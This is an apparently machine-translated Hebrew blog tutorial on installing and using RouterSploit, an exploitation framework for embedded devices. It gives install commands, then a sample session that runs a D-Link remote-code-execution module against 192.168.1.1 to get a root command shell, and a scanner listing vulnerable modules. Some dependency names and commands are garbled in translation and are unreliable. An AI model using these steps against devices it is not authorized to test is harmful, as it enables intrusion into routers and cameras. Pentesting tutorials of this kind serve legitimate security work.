
RouterSploit היא מסגרת ניצול מדהימה שנעשתה במיוחד עבור מכשירים משובצים.
כלי זה יכול לשמש את pentester כדי לסרוק את האבטחה של מצלמות ונתבים.
הדגשות של RouterSploit:
- מקודד ב- Python.
- ממשק שורת הפקודה.
- תמיכת Docker.
- כלים מודולריים.
מערכת הפעלה נתמכת:
- MacOS.
- לינוקס.
- טלפון אנדרואיד.
- חלונות.
התקנת RouterSploit:
דרישות:
- עָתִידִי
- בקשות
- Paramic
- לְהַפְסִיק
- pycrypto
אופציונלי:
- כחולה – Bluetooth באנרגיה נמוכה
התקנה בקאלי לינוקס:
בצע את הפקודות למטה:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
תמיכה ב-Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
התקנה באובונטו:
בצע את הפקודות למטה:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
תמיכה ב-Bluetooth Low Energy:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
התקנה על MacOS:
בצע את הפקודות למטה:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
התקנה על Docker:
בצע את הפקודות למטה:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
כיצד לעדכן RouterSploit?
עליך לעדכן את RouterSploit לעתים קרובות כדי למנוע אי נוחות.
מודולים חדשים נשלחים כמעט כל יום.
cd routersploit
git pull
כיצד להשתמש ב-RouterSploit?
נוֹהָג
root@kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ \_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__| | | מסגרת ניצול עבור |_| מאת Threat9 מכשירים משובצים שם קוד : ידעתי שאתה צרות גרסה : 3.3.0 דף הבית : https://www.threat9.com/ - @threatnine הצטרף ל-Slack : routersploit.slack.com הצטרף לתוכנית הביטא Threat9 - https://www.threat9.com/ מנצלים: 128 סורקים: 4 קרדס: 165 כְּלָלִי: 4 מטענים: 32 מקודדים: 6 rsf >
מנצלים:
כדי לבצע את הניצול, פשוט בחר את המודול והגדר את היעד:
rsf > השתמש בניצול/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > השתמש ב-exploit/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
להשלמה השתמש במקש Tab.
להצגת אפשרויות, סוּגshow:
rsf (D-LINK DIR-300 & DIR-600 RCE) > הצג אפשרויות אפשרויות יעד: שם הגדרות נוכחיות תיאור ---- ---------------- ----------- יעד כתובת יעד, למשל. http://192.168.1.1 נָמָל 80 נמל יעד
לְהִשְׁתַמֵשׁrun אוֹexploit פקודה כדי לנצל את המטרה:
rsf (D-LINK DIR-300 & DIR-600 RCE) > לָרוּץ [+] המטרה היא פגיעה [*] מפעיל לולאת פקודה... cmd > וואומי שורש
כדי להגדיר אפשרויות:
rsf (D-LINK DIR-300 & DIR-600 RCE) > הגדר יעד http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}
אפשר לבדוק אם היעד פגיע לניצול מסוים:
rsf (D-LINK DIR-300 & DIR-600 RCE) > לִבדוֹק [+] המטרה היא פגיעה
לָרוּץshow info כדי להציג מידע על הניצול.
סריקה לאיתור יעדים פגיעים:
סורקים מאפשרים לאמת במהירות אם היעד חשוף לניצול כלשהו.
השתמש באותן פקודות כדי להציג/להגדיר אפשרויות, וגם לרוץ.
rsf (סורק D-Link) > לָרוּץ [+] exploits/dlink/dwr_932_info_disclosure הוא פגיע [-] exploits/dlink/dir_300_320_615_auth_bypass אינו פגיע [-] exploits/dlink/dsl_2750b_info_disclosure אינו פגיע [-] exploits/dlink/dns_320l_327l_rce אינו פגיע [-] exploits/dlink/dir_645_password_disclosure אינו פגיע [-] exploits/dlink/dir_300_600_615_info_disclosure אינו פגיע [-] exploits/dlink/dir_300_600_rce אינו פגיע [+] המכשיר פגיע! - exploits/dlink/dwr_932_info_disclosure
קרא גם: 1337x proxy
מילים אחרונות:
RouterSploit הוא כלי מדהים לשימוש.
אם אתה נתקל בבעיות כלשהן בנוגע ל RouterSploit. הקפד להגיב למטה. הצוות שלנו CSHAWK ייצור איתך קשר בהקדם.